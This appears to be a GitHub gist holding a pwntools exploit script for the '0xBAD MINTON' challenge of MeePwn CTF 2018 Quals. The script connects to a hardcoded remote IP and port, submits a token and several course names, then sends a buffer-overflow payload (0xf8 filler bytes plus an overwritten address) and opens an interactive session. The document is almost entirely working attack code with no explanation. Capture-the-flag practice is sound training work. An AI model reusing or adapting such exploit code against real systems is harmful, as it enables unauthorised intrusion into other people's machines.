Instantly share code, notes, and snippets.

Embed
What would you like to do?
MeePwn CTF 2018 Quals 0xBAD MINTON
#!/usr/bin/env python
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# libc = ELF('')
elf = ELF('./backend_server')
context(os='linux', arch=elf.arch)
context(log_level='debug') # output verbose log
RHOST = "178.128.84.72"
RPORT = 9997
LHOST = "127.0.0.1"
LPORT = 9997
def section_addr(name, elf=elf):
return elf.get_section_by_name(name).header['sh_addr']
def dbg(ss):
log.info("%s: 0x%x" % (ss, eval(ss)))
conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
if opt in 'rl':
conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
gdbscript = """
continue
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
conn = gdb.debug(['./backend_server'], gdbscript=gdbscript)
else:
conn = process(['./backend_server'])
# conn = process(['./backend_server'], env={'LD_PRELOAD': ''})
if opt == 'a': gdb.attach(conn)
# exploit
log.info('Pwning')
token = 'c96ad7c54d14a76b9a940d662b18efa77637c2451d8363aa93159d130f4c712f'
conn.sendlineafter('Token>', token)
conn.sendlineafter('What is the course name?>', 'hoge')
conn.sendlineafter('What is the course name?>', 'hoge')
conn.sendlineafter('What is the course name?>', 'hoge')
payload = 'x'*0xf8 + p64(0x604070)
conn.sendlineafter('What is the course name?>', payload)
conn.sendline('3')
conn.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment